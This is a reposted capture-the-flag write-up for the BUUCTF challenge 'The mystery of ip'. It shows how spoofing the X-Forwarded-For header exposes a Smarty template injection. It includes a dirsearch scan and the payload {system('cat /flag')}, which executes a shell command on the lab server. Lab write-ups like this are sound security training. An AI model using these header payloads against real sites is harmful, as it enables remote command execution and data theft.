当前位置：网站首页>BUUCTF WEB [BJDCTF2020]The mystery of ip

BUUCTF WEB [BJDCTF2020]The mystery of ip

2022-04-23 12:33:00 【Y1Daa】

BUUCTF WEB [BJDCTF2020]The mystery of ip

stay hint.php Find a comment in

<!-- Do you know why i know your ip? -->

stay flag.php See yourself in ip, Associated with the X-Forwarded-For. Use Hackbar Add one HTTP head
```
X-Forwarded-For: 127.0.0.1
```
Echo as
```
Your IP is : 127.0.0.1 
```
It shows that we have obtained controllable variables

Attempt to inject command failed , There's no idea here , Try dirsearch See if you can get any information

# Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/

200     6KB  http://node4.buuoj.cn:28825/.DS_Store
301   169B   http://node4.buuoj.cn:28825/css    -> REDIRECTS TO: http://node4.buuoj.cn/css/
200     2KB  http://node4.buuoj.cn:28825/flag.php
200   938B   http://node4.buuoj.cn:28825/header.php
301   169B   http://node4.buuoj.cn:28825/img    -> REDIRECTS TO: http://node4.buuoj.cn/img/
301   169B   http://node4.buuoj.cn:28825/libs    -> REDIRECTS TO: http://node4.buuoj.cn/libs/
301   169B   http://node4.buuoj.cn:28825/templates_c    -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/
403   555B   http://node4.buuoj.cn:28825/templates_c/

We found one called /template_c/ Folder , Template injection is suspected

take X-Forwarded-For Change it to

X-Forwarded-For: {6*6}

Echo as

Your IP is : 36

Attempt to read directly flag file

X-Forwarded-For: {system('cat /flag')}

The echo

Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}

版权声明
本文为[Y1Daa]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/04/202204231227159550.html

当前位置：网站首页>BUUCTF WEB [BJDCTF2020]The mystery of ip

BUUCTF WEB [BJDCTF2020]The mystery of ip

BUUCTF WEB [BJDCTF2020]The mystery of ip

边栏推荐

猜你喜欢

随机推荐